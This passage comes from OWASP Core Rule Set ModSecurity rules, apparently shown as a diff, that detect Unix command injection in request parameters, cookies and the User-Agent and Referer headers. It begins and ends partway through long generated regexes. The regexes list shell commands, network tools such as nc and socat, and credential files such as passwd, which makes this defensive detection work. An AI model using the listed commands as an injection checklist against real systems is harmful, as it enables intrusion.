lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:datectl|out[\s\v&\)<>\|]))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:3m|c|a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \ + "id:932236,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection (command without evasion)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# This is a sibling of rule 932236. +# This sibling detects Unix RCE in request headers Referer and User-Agent. +# It uses the same regex but excludes known user-agents to avoid false positives. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# +# Regular expression generated from regex-assembly/932239.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932239 +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible-playbook|tobm)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:[\s\v&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\v&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\v&\)<>\|]|l(?:[\s\v&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|y(?:thon[2-3]|3?versions))|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:(?:facl)?[\s\v&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:datectl|out[\s\v&\)<>\|]))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:c|a(?:ll|tch)[\s\v&\)<>\|]|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \ + "id:932239,\ + phase:1,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection found in user-agent or referer header',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell snippets ] +# +# Detect some common sequences found in shell commands and scripts. +# +# Some commands which were restricted in earlier rules due to FP, +# have been added here with their full path, in order to catch some +# cases where the full path is sent. +# +# Rule relations: +# +# .932160 (base rule, PL1, unix shell commands with full path) +# ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers) +# +SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-shell.data" \ + "id:932161,\ + phase:2,\ + block,\ + capture,\ + t:none,t:cmdLine,t:normalizePath,\ + msg:'Remote Command Execution: Unix Shell Code Found in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + +# [ Unix command injection ] +# +# This rule targets pefix + commans that are prone to false positive detection at PL3. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932232.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932232 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?2[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]